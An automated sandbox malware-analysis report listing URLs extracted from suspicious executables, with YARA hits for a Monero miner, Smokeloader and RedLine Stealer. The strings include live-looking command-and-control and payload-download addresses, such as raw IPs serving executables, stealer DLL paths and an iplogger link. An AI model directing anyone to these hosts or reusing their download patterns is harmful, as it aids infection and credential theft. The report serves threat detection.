                    Source: d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download=%Z
                    Source: d5cd5e4aa8.exe, 0000002E.00000002.4041645751.000000000567C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864020294.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download
                    Source: d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864020294.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download&%
                    Source: d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/downloadI$.
                    Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/VB
                    Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/aMoh
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exeT
                    Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                    Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.0000000001108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeJ
                    Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                    Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe:
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://185.215.113.206
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll5G
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp, 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpecee80c0ba92f6f38a0bad9769dfExtension
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpge
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpx
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/dq
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://185.215.113.206c4becf79229cb002.phpge
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://185.215.113.206ta
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: ea17d0b77a.exe, 0000002F.00000003.3503997226.00000000010DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro8
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: c359af6492.exe.14.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                    Source: c359af6492.exe.14.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: c359af6492.exe.14.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                    Source: c359af6492.exe.14.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: c359af6492.exe.14.drString found in binary or memory: http://ocsp.sectigo.com0
                    Source: c359af6492.exe, 00000010.00000000.2914213620.0000000000423000.00000002.00000001.01000000.0000000B.sdmp, c359af6492.exe.14.drString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                    Source: d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000585D000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868146778.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868658111.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869728348.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3863773219.000000000569F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869516834.0000000005A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                    Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                    Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                    Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                    Source: ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3356315250.0000000005999000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3538247582.000000000599D000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3537566773.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355441716.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355493240.0000000005997000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504377940.000000000599C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3533335417.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504078369.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.0000000001072000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3471828382.00000000010F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
                    Source: ea17d0b77a.exe, 0000002F.00000003.3539294349.0000000001072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/=G
                    Source: ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/P
                    Source: ea17d0b77a.exe, 0000002F.00000003.3474594016.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3421003760.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.000000000108C000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355441716.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504377940.000000000599C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3464019441.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3464019441.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3474594016.0000000005989000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3421454526.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504078369.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3314582270.0000000005989000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3533335417.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3390597746.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3358345765.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3422664576.0000000005996000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3537566773.0000000001108000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3396433955.0000000005992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
                    Source: ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiqqqqqq
                    Source: ea17d0b77a.exe, 0000002F.00000003.3537566773.00000000010F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/jBpk9
                    Source: ea17d0b77a.exe, 0000002F.00000003.3475247118.00000000010E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api
                    Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000585D000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868146778.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868658111.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869728348.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3863773219.000000000569F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869516834.0000000005A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g-cleanit.hk
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
                    Source: ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000585D000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868146778.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868658111.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869728348.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3863773219.000000000569F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869516834.0000000005A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1Pz8p7
                    Source: c359af6492.exe.14.drString found in binary or memory: https://sectigo.com/CPS0
                    Source: 9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: ea17d0b77a.exe, 0000002F.00000003.3358748084.0000000005AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: 9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                    Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                    Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: ea17d0b77a.exe, 0000002F.00000003.3358203921.00000000059B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                    Source: ea17d0b77a.exe, 0000002F.00000003.3358203921.00000000059B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/about/AFIJJJJKJDHD
                    Source: 9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
                    Source: 9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                    Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                    Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
                    Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s

                    System Summary

                    barindex
                    Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 0000002E.00000002.4037878938.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 0000002E.00000002.4018196816.0000000000F39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
